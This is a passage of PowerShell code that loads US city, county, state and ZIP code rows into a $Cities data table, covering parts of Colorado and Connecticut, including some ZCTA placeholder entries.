$Cities.Rows.Add("Coaldale","Fremont","Colorado","CO","8","81222") + $null = $Cities.Rows.Add("Cotopaxi","Fremont","Colorado","CO","8","81223") + $null = $Cities.Rows.Add("Crested butte","Gunnison","Colorado","CO","8","81224") + $null = $Cities.Rows.Add("Crested butte","Gunnison","Colorado","CO","8","81225") + $null = $Cities.Rows.Add("Florence","Fremont","Colorado","CO","8","81226") + $null = $Cities.Rows.Add("Gunnison","Gunnison","Colorado","CO","8","81230") + $null = $Cities.Rows.Add("Howard","Fremont","Colorado","CO","8","81233") + $null = $Cities.Rows.Add("Lake city","Hinsdale","Colorado","CO","8","81235") + $null = $Cities.Rows.Add("Nathrop","Chaffee","Colorado","CO","8","81236") + $null = $Cities.Rows.Add("Parlin","Gunnison","Colorado","CO","8","81239") + $null = $Cities.Rows.Add("Penrose","Fremont","Colorado","CO","8","81240") + $null = $Cities.Rows.Add("Pitkin","Gunnison","Colorado","CO","8","81241") + $null = $Cities.Rows.Add("Powderhorn","Gunnison","Colorado","CO","8","81243") + $null = $Cities.Rows.Add("Rockvale","Fremont","Colorado","CO","8","81244") + $null = $Cities.Rows.Add("Sargents","Saguache","Colorado","CO","8","81248") + $null = $Cities.Rows.Add("Twin lakes","Lake","Colorado","CO","8","81251") + $null = $Cities.Rows.Add("Westcliffe","Custer","Colorado","CO","8","81252") + $null = $Cities.Rows.Add("Wetmore","Custer","Colorado","CO","8","81253") + $null = $Cities.Rows.Add("Zcta 812hh","Fremont","Colorado","CO","8","812HH") + $null = $Cities.Rows.Add("Zcta 812xx","Hinsdale","Colorado","CO","8","812XX") + $null = $Cities.Rows.Add("Durango","La Plata","Colorado","CO","8","81301") + $null = $Cities.Rows.Add("Cahone","Dolores","Colorado","CO","8","81320") + $null = $Cities.Rows.Add("Cortez","Montezuma","Colorado","CO","8","81321") + $null = $Cities.Rows.Add("Dolores","Montezuma","Colorado","CO","8","81323") + $null = $Cities.Rows.Add("Dove creek","Dolores","Colorado","CO","8","81324") + $null = $Cities.Rows.Add("Egnar","San Miguel","Colorado","CO","8","81325") + $null = $Cities.Rows.Add("Hesperus","La Plata","Colorado","CO","8","81326") + $null = $Cities.Rows.Add("Lewis","Montezuma","Colorado","CO","8","81327") + $null = $Cities.Rows.Add("Mancos","Montezuma","Colorado","CO","8","81328") + $null = $Cities.Rows.Add("Mesa verde natio","Montezuma","Colorado","CO","8","81330") + $null = $Cities.Rows.Add("Pleasant view","Montezuma","Colorado","CO","8","81331") + $null = $Cities.Rows.Add("Rico","Dolores","Colorado","CO","8","81332") + $null = $Cities.Rows.Add("Towaoc","Montezuma","Colorado","CO","8","81334") + $null = $Cities.Rows.Add("Yellow jacket","Montezuma","Colorado","CO","8","81335") + $null = $Cities.Rows.Add("Zcta 813xx","Dolores","Colorado","CO","8","813XX") + $null = $Cities.Rows.Add("Montrose","Montrose","Colorado","CO","8","81401") + $null = $Cities.Rows.Add("Austin","Delta","Colorado","CO","8","81410") + $null = $Cities.Rows.Add("Bedrock","Montrose","Colorado","CO","8","81411") + $null = $Cities.Rows.Add("Cedaredge","Delta","Colorado","CO","8","81413") + $null = $Cities.Rows.Add("Crawford","Delta","Colorado","CO","8","81415") + $null = $Cities.Rows.Add("Delta","Delta","Colorado","CO","8","81416") + $null = $Cities.Rows.Add("Eckert","Delta","Colorado","CO","8","81418") + $null = $Cities.Rows.Add("Hotchkiss","Delta","Colorado","CO","8","81419") + $null = $Cities.Rows.Add("Naturita","Montrose","Colorado","CO","8","81422") + $null = $Cities.Rows.Add("Norwood","San Miguel","Colorado","CO","8","81423") + $null = $Cities.Rows.Add("Nucla","Montrose","Colorado","CO","8","81424") + $null = $Cities.Rows.Add("Olathe","Montrose","Colorado","CO","8","81425") + $null = $Cities.Rows.Add("Ophir","San Miguel","Colorado","CO","8","81426") + $null = $Cities.Rows.Add("Ouray","Ouray","Colorado","CO","8","81427") + $null = $Cities.Rows.Add("Paonia","Delta","Colorado","CO","8","81428") + $null = $Cities.Rows.Add("Placerville","San Miguel","Colorado","CO","8","81430") + $null = $Cities.Rows.Add("Redvale","Montrose","Colorado","CO","8","81431") + $null = $Cities.Rows.Add("Ridgway","Ouray","Colorado","CO","8","81432") + $null = $Cities.Rows.Add("Silverton","San Juan","Colorado","CO","8","81433") + $null = $Cities.Rows.Add("Somerset","Gunnison","Colorado","CO","8","81434") + $null = $Cities.Rows.Add("Telluride","San Miguel","Colorado","CO","8","81435") + $null = $Cities.Rows.Add("Zcta 814xx","San Juan","Colorado","CO","8","814XX") + $null = $Cities.Rows.Add("Grand junction","Mesa","Colorado","CO","8","81501") + $null = $Cities.Rows.Add("Grand junction","Mesa","Colorado","CO","8","81503") + $null = $Cities.Rows.Add("Fruitvale","Mesa","Colorado","CO","8","81504") + $null = $Cities.Rows.Add("Grand junction","Mesa","Colorado","CO","8","81505") + $null = $Cities.Rows.Add("Grand junction","Mesa","Colorado","CO","8","81506") + $null = $Cities.Rows.Add("Clifton","Mesa","Colorado","CO","8","81520") + $null = $Cities.Rows.Add("Fruita","Mesa","Colorado","CO","8","81521") + $null = $Cities.Rows.Add("Gateway","Mesa","Colorado","CO","8","81522") + $null = $Cities.Rows.Add("Glade park","Mesa","Colorado","CO","8","81523") + $null = $Cities.Rows.Add("Loma","Mesa","Colorado","CO","8","81524") + $null = $Cities.Rows.Add("Mack","Mesa","Colorado","CO","8","81525") + $null = $Cities.Rows.Add("Palisade","Mesa","Colorado","CO","8","81526") + $null = $Cities.Rows.Add("Whitewater","Mesa","Colorado","CO","8","81527") + $null = $Cities.Rows.Add("Zcta 815hh","Mesa","Colorado","CO","8","815HH") + $null = $Cities.Rows.Add("Zcta 815xx","Mesa","Colorado","CO","8","815XX") + $null = $Cities.Rows.Add("Glenwood springs","Garfield","Colorado","CO","8","81601") + $null = $Cities.Rows.Add("Dinosaur","Moffat","Colorado","CO","8","81610") + $null = $Cities.Rows.Add("Aspen","Pitkin","Colorado","CO","8","81611") + $null = $Cities.Rows.Add("Snowmass village","Pitkin","Colorado","CO","8","81615") + $null = $Cities.Rows.Add("Avon","Eagle","Colorado","CO","8","81620") + $null = $Cities.Rows.Add("Basalt","Eagle","Colorado","CO","8","81621") + $null = $Cities.Rows.Add("Marble","Garfield","Colorado","CO","8","81623") + $null = $Cities.Rows.Add("Collbran","Mesa","Colorado","CO","8","81624") + $null = $Cities.Rows.Add("Craig","Moffat","Colorado","CO","8","81625") + $null = $Cities.Rows.Add("De beque","Mesa","Colorado","CO","8","81630") + $null = $Cities.Rows.Add("Eagle","Eagle","Colorado","CO","8","81631") + $null = $Cities.Rows.Add("Edwards","Eagle","Colorado","CO","8","81632") + $null = $Cities.Rows.Add("Battlement mesa","Garfield","Colorado","CO","8","81635") + $null = $Cities.Rows.Add("Gypsum","Eagle","Colorado","CO","8","81637") + $null = $Cities.Rows.Add("Hamilton","Moffat","Colorado","CO","8","81638") + $null = $Cities.Rows.Add("Hayden","Routt","Colorado","CO","8","81639") + $null = $Cities.Rows.Add("Maybell","Moffat","Colorado","CO","8","81640") + $null = $Cities.Rows.Add("Meeker","Rio Blanco","Colorado","CO","8","81641") + $null = $Cities.Rows.Add("Meredith","Pitkin","Colorado","CO","8","81642") + $null = $Cities.Rows.Add("Mesa","Mesa","Colorado","CO","8","81643") + $null = $Cities.Rows.Add("Gilman","Eagle","Colorado","CO","8","81645") + $null = $Cities.Rows.Add("Molina","Mesa","Colorado","CO","8","81646") + $null = $Cities.Rows.Add("New castle","Garfield","Colorado","CO","8","81647") + $null = $Cities.Rows.Add("Rangely","Rio Blanco","Colorado","CO","8","81648") + $null = $Cities.Rows.Add("Red cliff","Eagle","Colorado","CO","8","81649") + $null = $Cities.Rows.Add("Rifle","Garfield","Colorado","CO","8","81650") + $null = $Cities.Rows.Add("Silt","Garfield","Colorado","CO","8","81652") + $null = $Cities.Rows.Add("Slater","Routt","Colorado","CO","8","81653") + $null = $Cities.Rows.Add("Snowmass","Pitkin","Colorado","CO","8","81654") + $null = $Cities.Rows.Add("Wolcott","Eagle","Colorado","CO","8","81655") + $null = $Cities.Rows.Add("Woody creek","Pitkin","Colorado","CO","8","81656") + $null = $Cities.Rows.Add("Vail","Eagle","Colorado","CO","8","81657") + $null = $Cities.Rows.Add("Zcta 816hh","Garfield","Colorado","CO","8","816HH") + $null = $Cities.Rows.Add("Zcta 816xx","Moffat","Colorado","CO","8","816XX") + $null = $Cities.Rows.Add("","Larimer","Colorado","CO","8","82063") + $null = $Cities.Rows.Add("Avon","Hartford","Connecticut","CT","9","06001") + $null = $Cities.Rows.Add("Bloomfield","Hartford","Connecticut","CT","9","06002") + $null = $Cities.Rows.Add("Bristol","Hartford","Connecticut","CT","9","06010") + $null = $Cities.Rows.Add("Burlington","Hartford","Connecticut","CT","9","06013") + $null = $Cities.Rows.Add("Windsorville","Hartford","Connecticut","CT","9","06016") + $null = $Cities.Rows.Add("Canaan","Litchfield","Connecticut","CT","9","06018") + $null = $Cities.Rows.Add("Canton","Hartford","Connecticut","CT","9","06019") + $null = $Cities.Rows.Add("Canton center","Hartford","Connecticut","CT","9","06020") + $null = $Cities.Rows.Add("Colebrook","Litchfield","Connecticut","CT","9","06021") + $null = $Cities.Rows.Add("Collinsville","Hartford","Connecticut","CT","9","06022") + $null = $Cities.Rows.Add("East berlin","Hartford","Connecticut","CT","9","06023") + $null = $Cities.Rows.Add("East canaan","Litchfield","Connecticut","CT","9","06024") + $null = $Cities.Rows.Add("East granby","Hartford","Connecticut","CT","9","06026") + $null = $Cities.Rows.Add("East hartland","Hartford","Connecticut","CT","9","06027") + $null = $Cities.Rows.Add("Ellington","Tolland","Connecticut","CT","9","06029") + $null = $Cities.Rows.Add("Falls village","Litchfield","Connecticut","CT","9","06031") + $null = $Cities.Rows.Add("Farmington","Hartford","Connecticut","CT","9","06032") + $null = $Cities.Rows.Add("Glastonbury","Hartford","Connecticut","CT","9","06033") + $null = $Cities.Rows.Add("Granby","Hartford","Connecticut","CT","9","06035") + $null = $Cities.Rows.Add("Berlin","Hartford","Connecticut","CT","9","06037") + $null = $Cities.Rows.Add("Lakeville","Litchfield","Connecticut","CT","9","06039") + $null = $Cities.Rows.Add("Manchester","Hartford","Connecticut","CT","9","06040") + $null = $Cities.Rows.Add("Bolton","Tolland","Connecticut","CT","9","06043") + $null = $Cities.Rows.Add("New britain","Hartford","Connecticut","CT","9","06051") + $null = $Cities.Rows.Add("New britain","Hartford","Connecticut","CT","9","06052") + $null = $Cities.Rows.Add("New britain","Hartford","Connecticut","CT","9","06053") + $null = $Cities.Rows.Add("New hartford","Litchfield","Connecticut","CT","9","06057") + $null = $Cities.Rows.Add("Norfolk","Litchfield","Connecticut","CT","9","06058") + $null = $Cities.Rows.Add("North canton","Litchfield","Connecticut","CT","9","06059") + $null = $Cities.Rows.Add("North granby","Hartford","Connecticut","CT","9","06060") + $null = $Cities.Rows.Add("Plainville","Hartford","Connecticut","CT","9","06062") + $null = $Cities.Rows.Add("Pleasant valley","Litchfield","Connecticut","CT","9","06063") + $null = $Cities.Rows.Add("Riverton","Litchfield","Connecticut","CT","9","06065") + $null = $Cities.Rows.Add("Vernon rockville","Tolland","Connecticut","CT","9","06066") + $null = $Cities.Rows.Add("Rocky hill","Hartford","Connecticut","CT","9","06067") + $null = $Cities.Rows.Add("Salisbury","Litchfield","Connecticut","CT","9","06068") + $null = $Cities.Rows.Add("Sharon","Litchfield","Connecticut","CT","9","06069") + $null = $Cities.Rows.Add("Simsbury","Hartford","Connecticut","CT","9","06070") + $null = $Cities.Rows.Add("Somers","Tolland","Connecticut","CT","9","06071") + $null = $Cities.Rows.Add("South glastonbur","Hartford","Connecticut","CT","9","06073") + $null = $Cities.Rows.Add("South windsor","Hartford","Connecticut","CT","9","06074") + $null = $Cities.Rows.Add("Stafford springs","Tolland","Connecticut","CT","9","06076") + $null = $Cities.Rows.Add("Suffield","Hartford","Connecticut","CT","9","06078") + $null = $Cities.Rows.Add("Tariffville","Hartford","Connecticut","CT","9","06081") + $null = $Cities.Rows.Add("Enfield","Hartford","Connecticut","CT","9","06082") + $null = $Cities.Rows.Add("Tolland","Tolland","Connecticut","CT","9","06084") + $null = $Cities.Rows.Add("Unionville","Hartford","Connecticut","CT","9","06085") + $null = $Cities.Rows.Add("East windsor","Hartford","Connecticut","CT","9","06088") + $null = $Cities.Rows.Add("Weatogue","Hartford","Connecticut","CT","9","06089") + $null = $Cities.Rows.Add("West granby","Hartford","Connecticut","CT","9","06090") + $null = $Cities.Rows.Add("West hartland","Hartford","Connecticut","CT","9","06091") + $null = $Cities.Rows.Add("West simsbury","Hartford","Connecticut","CT","9","06092") + $null = $Cities.Rows.Add("West suffield","Hartford","Connecticut","CT","9","06093") + $null = $Cities.Rows.Add("Windsor","Hartford","Connecticut","CT","9","06095") + $null = $Cities.Rows.Add("Windsor locks","Hartford","Connecticut","CT","9","06096") + $null = $Cities.Rows.Add("Winsted","Litchfield","Connecticut","CT","9","06098") + $null = $Cities.Rows.Add("Zcta 060hh","Hartford","Connecticut","CT","9","060HH") + $null = $Cities.Rows.Add("Hartford","Hartford","Connecticut","CT","9","06103") + $null = $Cities.Rows.Add("Hartford","Hartford","Connecticut","CT","9","06105") + $null = $Cities.Rows.Add("Hartford","Hartford","Connecticut","CT","9","06106") + $null = $Cities.Rows.Add("W hartford","Hartford","Connecticut","CT","9","06107") + $null = $Cities.Rows.Add("East hartford","Hartford","Connecticut","CT","9","06108") + $null = $Cities.Rows.Add("Wethersfield","Hartford","Connecticut","CT","9","06109") + $null = $Cities.Rows.Add("W hartford","Hartford","Connecticut","CT","9","06110") + $null = $Cities.Rows.Add("Maple hill","Hartford","Connecticut","CT","9","06111") + $null = $Cities.Rows.Add("Hartford","Hartford","Connecticut","CT","9","06112") + $null = $Cities.Rows.Add("Hartford","Hartford","Connecticut","CT","9","06114") + $null = $Cities.Rows.Add("W hartford","Hartford","Connecticut","CT","9","06117") + $null = $Cities.Rows.Add("East hartford","Hartford","Connecticut","CT","9","06118") + $null = $Cities.Rows.Add("W hartford","Hartford","Connecticut","CT","9","06119") + $null = $Cities.Rows.Add("Hartford","Hartford","Connecticut","CT","9","06120") + $null = $Cities.Rows.Add("Zcta 061hh","Hartford","Connecticut","CT","9","061HH") + $null = $Cities.Rows.Add("Willimantic","Windham","Connecticut","CT","9","06226") + $null = $Cities.Rows.Add("Amston","Tolland","Connecticut","CT","9","06231") + $null = $Cities.Rows.Add("Andover","Tolland","Connecticut","CT","9","06232") + $null = $Cities.Rows.Add("Brooklyn","Windham","Connecticut","CT","9","06234") + $null = $Cities.Rows.Add("Chaplin","Windham","Connecticut","CT","9","06235") + $null = $Cities.Rows.Add("Columbia","Tolland","Connecticut","CT","9","06237") + $null = $Cities.Rows.Add("Coventry","Tolland","Connecticut","CT","9","06238") + $null = $Cities.Rows.Add("Danielson","Windham","Connecticut","CT","9","06239") + $null = $Cities.Rows.Add("Dayville","Windham","Connecticut","CT","9","06241") + $null = $Cities.Rows.Add("Eastford","Windham","Connecticut","CT","9","06242") + $null = $Cities.Rows.Add("Hampton","Windham","Connecticut","CT","9","06247") + $null = $Cities.Rows.Add("Hebron","Tolland","Connecticut","CT","9","06248") + $null = $Cities.Rows.Add("Lebanon","New London","Connecticut","CT","9","06249") + $null = $Cities.Rows.Add("Mansfield center","Tolland","Connecticut","CT","9","06250") + $null = $Cities.Rows.Add("North franklin","New London","Connecticut","CT","9","06254") + $null = $Cities.Rows.Add("North grosvenord","Windham","Connecticut","CT","9","06255") + $null = $Cities.Rows.Add("North windham","Windham","Connecticut","CT","9","06256") + $null = $Cities.Rows.Add("Pomfret center","Windham","Connecticut","CT","9","06259") + $null = $Cities.Rows.Add("Putnam","Windham","Connecticut","CT","9","06260") + $null = $Cities.Rows.Add("Quinebaug","Windham","Connecticut","CT","9","06262") + $null = $Cities.Rows.Add("Scotland","Windham","Connecticut","CT","9","06264") + $null = $Cities.Rows.Add("South windham","Windham","Connecticut","CT","9","06266") + $null = $Cities.Rows.Add("Storrs mansfield","Tolland","Connecticut","CT","9","06268") + $null = $Cities.Rows.Add("University of ct","Tolland","Connecticut","CT","9","06269") + $null = $Cities.Rows.Add("Thompson","Windham","Connecticut","CT","9","06277") + $null = $Cities.Rows.Add("Warrenville","Windham","Connecticut","CT","9","06278") + $null = $Cities.Rows.Add("West willington","Tolland","Connecticut","CT","9","06279") + $null = $Cities.Rows.Add("Windham","Windham","Connecticut","CT","9","06280") + $null = $Cities.Rows.Add("Woodstock","Windham","Connecticut","CT","9","06281") + $null = $Cities.Rows.Add("Woodstock valley","Windham","Connecticut","CT","9","06282") + $null = $Cities.Rows.Add("Zcta 062hh","Windham","Connecticut","CT","9","062HH") + $null = $Cities.Rows.Add("New london","New London","Connecticut","CT","9","06320") + $null = $Cities.Rows.Add("Baltic","New London","Connecticut","CT","9","06330") + $null = $Cities.Rows.Add("Canterbury","Windham","Connecticut","CT","9","06331") + $null = $Cities.Rows.Add("East lyme","New London","Connecticut","CT","9","06333") + $null = $Cities.Rows.Add("Bozrah","New London","Connecticut","CT","9","06334") + $null = $Cities.Rows.Add("Gales ferry","New London","Connecticut","CT","9","06335") + $null = $Cities.Rows.Add("Gilman","New London","Connecticut","CT","9","06336") + $null = $Cities.Rows.Add("Ledyard","New London","Connecticut","CT","9","06339") + $null = $Cities.Rows.Add("Groton","New London","Connecticut","CT","9","06340") + $null = $Cities.Rows.Add("Jewett city","New London","Connecticut","CT","9","06351") + $null = $Cities.Rows.Add("Moosup","Windham","Connecticut","CT","9","06354") + $null = $Cities.Rows.Add("Mystic","New London","Connecticut","CT","9","06355") + $null = $Cities.Rows.Add("Niantic","New London","Connecticut","CT","9","06357") + $null = $Cities.Rows.Add("North stonington","New London","Connecticut","CT","9","06359") + $null = $Cities.Rows.Add("Norwich","New London","Connecticut","CT","9","06360") + $null = $Cities.Rows.Add("Preston","New London","Connecticut","CT","9","06365") + $null = $Cities.Rows.Add("Oakdale","New London","Connecticut","CT","9","06370") + $null = $Cities.Rows.Add("Old lyme","New London","Connecticut","CT","9","06371") + $null = $Cities.Rows.Add("Oneco","Windham","Connecticut","CT","9","06373") + $null = $Cities.Rows.Add("Plainfield","Windham","Connecticut","CT","9","06374") + $null = $Cities.Rows.Add("Quaker hill","New London","Connecticut","CT","9","06375") + $null = $Cities.Rows.Add("South lyme","New London","Connecticut","CT","9","06376") + $null = $Cities.Rows.Add("Sterling","Windham","Connecticut","CT","9","06377") + $null = $Cities.Rows.Add("Stonington","New London","Connecticut","CT","9","06378") + $null = $Cities.Rows.Add("Pawcatuck","New London","Connecticut","CT","9","06379") + $null = $Cities.Rows.Add("Taftville","New London","Connecticut","CT","9","06380") + $null = $Cities.Rows.Add("Uncasville","New London","Connecticut","CT","9","06382") + $null = $Cities.Rows.Add("Voluntown","New London","Connecticut","CT","9","06384") + $null = $Cities.Rows.Add("Waterford","New London","Connecticut","CT","9","06385") + $null = $Cities.Rows.Add("Zcta 063hh","New London","Connecticut","CT","9","063HH") + $null = $Cities.Rows.Add("Ansonia","New Haven","Connecticut","CT","9","06401") + $null = $Cities.Rows.Add("Beacon falls","New Haven","Connecticut","CT","9","06403") + $null = $Cities.Rows.Add("Branford","New Haven","Connecticut","CT","9","06405") + $null = $Cities.Rows.Add("Centerbrook","Middlesex","Connecticut","CT","9","06409") + $null = $Cities.Rows.Add("Cheshire","New Haven","Connecticut","CT","9","06410") + $null = $Cities.Rows.Add("Chester","Middlesex","Connecticut","CT","9","06412") + $null = $Cities.Rows.Add("Clinton","Middlesex","Connecticut","CT","9","06413") + $null = $Cities.Rows.Add("Colchester","New London","Connecticut","CT","9","06415") + $null = $Cities.Rows.Add("Cromwell","Middlesex","Connecticut","CT","9","06416") + $null = $Cities.Rows.Add("Deep river","Middlesex","Connecticut","CT","9","06417") + $null = $Cities.Rows.Add("Derby","New Haven","Connecticut","CT","9","06418") + $null = $Cities.Rows.Add("Killingworth","Middlesex","Connecticut","CT","9","06419") + $null = $Cities.Rows.Add("Salem","New London","Connecticut","CT","9","06420") + $null = $Cities.Rows.Add("Durham","Middlesex","Connecticut","CT","9","06422") + $null = $Cities.Rows.Add("East haddam","Middlesex","Connecticut","CT","9","06423") + $null = $Cities.Rows.Add("East hampton","Middlesex","Connecticut","CT","9","06424") + $null = $Cities.Rows.Add("Essex","Middlesex","Connecticut","CT","9","06426") + $null = $Cities.Rows.Add("Fairfield","Fairfield","Connecticut","CT","9","06430") + $null = $Cities.Rows.Add("Fairfield","Fairfield","Connecticut","CT","9","06432") + $null = $Cities.Rows.Add("Guilford","New Haven","Connecticut","CT","9","06437") + $null = $Cities.Rows.Add("Haddam","Middlesex","Connecticut","CT","9","06438") + $null = $Cities.Rows.Add("Higganum","Middlesex","Connecticut","CT","9","06441") + $null = $Cities.Rows.Add("Ivoryton","Middlesex","Connecticut","CT","9","06442") + $null = $Cities.Rows.Add("Madison","New Haven","Connecticut","CT","9","06443") + $null = $Cities.Rows.Add("Marlborough","Hartford","Connecticut","CT","9","06447") + $null = $Cities.Rows.Add("Meriden","New Haven","Connecticut","CT","9","06450") + $null = $Cities.Rows.Add("Meriden","New Haven","Connecticut","CT","9","06451") + $null = $Cities.Rows.Add("Middlefield","Middlesex","Connecticut","CT","9","06455") + $null = $Cities.Rows.Add("Middletown","Middlesex","Connecticut","CT","9","06457") + $null = $Cities.Rows.Add("Milford","New Haven","Connecticut","CT","9","06460") + $null = $Cities.Rows.Add("Monroe","Fairfield","Connecticut","CT","9","06468") + $null = $Cities.Rows.Add("Moodus","Middlesex","Connecticut","CT","9","06469") + $null = $Cities.Rows.Add("Newtown","Fairfield","Connecticut","CT","9","06470") + $null = $Cities.Rows.Add("North branford","New Haven","Connecticut","CT","9","06471") + $null = $Cities.Rows.Add("Northford","New Haven","Connecticut","CT","9","06472") + $null = $Cities.Rows.Add("North haven","New Haven","Connecticut","CT","9","06473") + $null = $Cities.Rows.Add("Old saybrook","Middlesex","Connecticut","CT","9","06475") + $null = $Cities.Rows.Add("Orange","New Haven","Connecticut","CT","9","06477") + $null = $Cities.Rows.Add("Oxford","New Haven","Connecticut","CT","9","06478") + $null = $Cities.Rows.Add("Plantsville","Hartford","Connecticut","CT","9","06479") + $null = $Cities.Rows.Add("Portland","Middlesex","Connecticut","CT","9","06480") + $null = $Cities.Rows.Add("Rockfall","Middlesex","Connecticut","CT","9","06481") + $null = $Cities.Rows.Add("Sandy hook","Fairfield","Connecticut","CT","9","06482") + $null = $Cities.Rows.Add("Seymour","New Haven","Connecticut","CT","9","06483") + $null = $Cities.Rows.Add("Shelton","Fairfield","Connecticut","CT","9","06484") + $null = $Cities.Rows.Add("Southbury","New Haven","Connecticut","CT","9","06488") + $null = $Cities.Rows.Add("Southington","Hartford","Connecticut","CT","9","06489") + $null = $Cities.Rows.Add("Southport","Fairfield","Connecticut","CT","9","06490") + $null = $Cities.Rows.Add("Wallingford","New Haven","Connecticut","CT","9","06492") + $null = $Cities.Rows.Add("Westbrook","Middlesex","Connecticut","CT","9","06498") + $null = $Cities.Rows.Add("Zcta 064hh","Fairfield","Connecticut","CT","9","064HH") + $null = $Cities.Rows.Add("New haven","New Haven","Connecticut","CT","9","06504") + $null = $Cities.Rows.Add("New haven","New Haven","Connecticut","CT","9","06510") + $null = $Cities.Rows.Add("New haven","New Haven","Connecticut","CT","9","06511") + $null = $Cities.Rows.Add("East haven","New Haven","Connecticut","CT","9","06512") + $null = $Cities.Rows.Add("East haven","New Haven","Connecticut","CT","9","06513") + $null = $Cities.Rows.Add("Hamden","New Haven","Connecticut","CT","9","06514") + $null = $Cities.Rows.Add("New haven","New Haven","Connecticut","CT","9","06515") + $null = $Cities.Rows.Add("West haven","New Haven","Connecticut","CT","9","06516") + $null = $Cities.Rows.Add("Hamden","New Haven","Connecticut","CT","9","06517") + $null = $Cities.Rows.Add("Hamden","New Haven","Connecticut","CT","9","06518") + $null = $Cities.Rows.Add("New haven","New Haven","Connecticut","CT","9","06519") + $null = $Cities.Rows.Add("Bethany","New Haven","Connecticut","CT","9","06524") + $null = $Cities.Rows.Add("Woodbridge","New Haven","Connecticut","CT","9","06525") + $null = $Cities.Rows.Add("Zcta 065hh","New Haven","Connecticut","CT","9","065HH") + $null = $Cities.Rows.Add("Bridgeport","Fairfield","Connecticut","CT","9","06604") + $null = $Cities.Rows.Add("Bridgeport","Fairfield","Connecticut","CT","9","06605") + $null = $Cities.Rows.Add("Bridgeport","Fairfield","Connecticut","CT","9","06606") + $null = $Cities.Rows.Add("Bridgeport","Fairfield","Connecticut","CT","9","06607") + $null = $Cities.Rows.Add("Bridgeport","Fairfield","Connecticut","CT","9","06608") + $null = $Cities.Rows.Add("Bridgeport","Fairfield","Connecticut","CT","9","06610") + $null = $Cities.Rows.Add("Trumbull","Fairfield","Connecticut","CT","9","06611") + $null = $Cities.Rows.Add("Easton","Fairfield","Connecticut","CT","9","06612") + $null = $Cities.Rows.Add("Zcta 06614","Fairfield","Connecticut","CT","9","06614") + $null = $Cities.Rows.Add("Zcta 06615","Fairfield","Connecticut","CT","9","06615") + $null = $Cities.Rows.Add("Zcta 066hh","Fairfield","Connecticut","CT","9","066HH") + $null = $Cities.Rows.Add("Waterbury","New Haven","Connecticut","CT","9","06702") + $null = $Cities.Rows.Add("Waterbury","New Haven","Connecticut","CT","9","06704") + $null = $Cities.Rows.Add("Waterbury","New Haven","Connecticut","CT","9","06705") + $null = $Cities.Rows.Add("Waterbury","New Haven","Connecticut","CT","9","06706") + $null = $Cities.Rows.Add("Waterbury","New Haven","Connecticut","CT","9","06708") + $null = $Cities.Rows.Add("Waterbury","New Haven","Connecticut","CT","9","06710") + $null = $Cities.Rows.Add("Prospect","New Haven","Connecticut","CT","9","06712") + $null = $Cities.Rows.Add("Wolcott","New Haven","Connecticut","CT","9","06716") + $null = $Cities.Rows.Add("Bantam","Litchfield","Connecticut","CT","9","06750") + $null = $Cities.Rows.Add("Bethlehem","Litchfield","Connecticut","CT","9","06751") + $null = $Cities.Rows.Add("Bridgewater","Litchfield","Connecticut","CT","9","06752") + $null = $Cities.Rows.Add("Warren","Litchfield","Connecticut","CT","9","06754") + $null = $Cities.Rows.Add("Gaylordsville","Litchfield","Connecticut","CT","9","06755") + $null = $Cities.Rows.Add("Goshen","Litchfield","Connecticut","CT","9","06756") + $null = $Cities.Rows.Add("Kent","Litchfield","Connecticut","CT","9","06757") + $null = $Cities.Rows.Add("Litchfield","Litchfield","Connecticut","CT","9","06759") + $null = $Cities.Rows.Add("Middlebury","New Haven","Connecticut","CT","9","06762") + $null = $Cities.Rows.Add("Morris","Litchfield","Connecticut","CT","9","06763") + $null = $Cities.Rows.Add("Naugatuck","New Haven","Connecticut","CT","9","06770") + $null = $Cities.Rows.Add("New milford","Litchfield","Connecticut","CT","9","06776") + $null = $Cities.Rows.Add("New preston marb","Litchfield","Connecticut","CT","9","06777") + $null = $Cities.Rows.Add("Northfield","Litchfield","Connecticut","CT","9","06778") + $null = $Cities.Rows.Add("Oakville","Litchfield","Connecticut","CT","9","06779") + $null = $Cities.Rows.Add("Plymouth","Litchfield","Connecticut","CT","9","06782") + $null = $Cities.Rows.Add("Roxbury","Litchfield","Connecticut","CT","9","06783") + $null = $Cities.Rows.Add("Sherman","Fairfield","Connecticut","CT","9","06784") + $null = $Cities.Rows.Add("South kent","Litchfield","Connecticut","CT","9","06785") + $null = $Cities.Rows.Add("Terryville","Litchfield","Connecticut","CT","9","06786") + $null = $Cities.Rows.Add("Thomaston","Litchfield","Connecticut","CT","9","06787") + $null = $Cities.Rows.Add("Torrington","Litchfield","Connecticut","CT","9","06790") + $null = $Cities.Rows.Add("Harwinton","Litchfield","Connecticut","CT","9","06791") + $null = $Cities.Rows.Add("Washington depot","Litchfield","Connecticut","CT","9","06793") + $null = $Cities.Rows.Add("Washington depot","Litchfield","Connecticut","CT","9","06794") + $null = $Cities.Rows.Add("Watertown","Litchfield","Connecticut","CT","9","06795") + $null = $Cities.Rows.Add("West cornwall","Litchfield","Connecticut","CT","9","06796") + $null = $Cities.Rows.Add("Woodbury","Litchfield","Connecticut","CT","9","06798") + $null = $Cities.Rows.Add("Zcta 067hh","Litchfield","Connecticut","CT","9","067HH") + $null = $Cities.Rows.Add("Bethel","Fairfield","Connecticut","CT","9","06801") + $null = $Cities.Rows.Add("Brookfield","Fairfield","Connecticut","CT","9","06804") + $null = $Cities.Rows.Add("Cos cob","Fairfield","Connecticut","CT","9","06807") + $null = $Cities.Rows.Add("Danbury","Fairfield","Connecticut","CT","9","06810") + $null = $Cities.Rows.Add("Danbury","Fairfield","Connecticut","CT","9","06811") + $null = $Cities.Rows.Add("New fairfield","Fairfield","Connecticut","CT","9","06812") + $null = $Cities.Rows.Add("Darien","Fairfield","Connecticut","CT","9","06820") + $null = $Cities.Rows.Add("Byram","Fairfield","Connecticut","CT","9","06830") + $null = $Cities.Rows.Add("Greenwich","Fairfield","Connecticut","CT","9","06831") + $null = $Cities.Rows.Add("New canaan","Fairfield","Connecticut","CT","9","06840") + $null = $Cities.Rows.Add("Norwalk","Fairfield","Connecticut","CT","9","06850") + $null = $Cities.Rows.Add("Norwalk","Fairfield","Connecticut","CT","9","06851") + $null = $Cities.Rows.Add("Norwalk","Fairfield","Connecticut","CT","9","06853") + $null = $Cities.Rows.Add("Norwalk","Fairfield","Connecticut","CT","9","06854") + $null = $Cities.Rows.Add("Norwalk","Fairfield","Connecticut","CT","9","06855") + $null = $Cities.Rows.Add("Old greenwich","Fairfield","Connecticut","CT","9","06870") + $null = $Cities.Rows.Add("Ridgefield","Fairfield","Connecticut","CT","9","06877") + $null = $Cities.Rows.Add("Riverside","Fairfield","Connecticut","CT","9","06878") + $null = 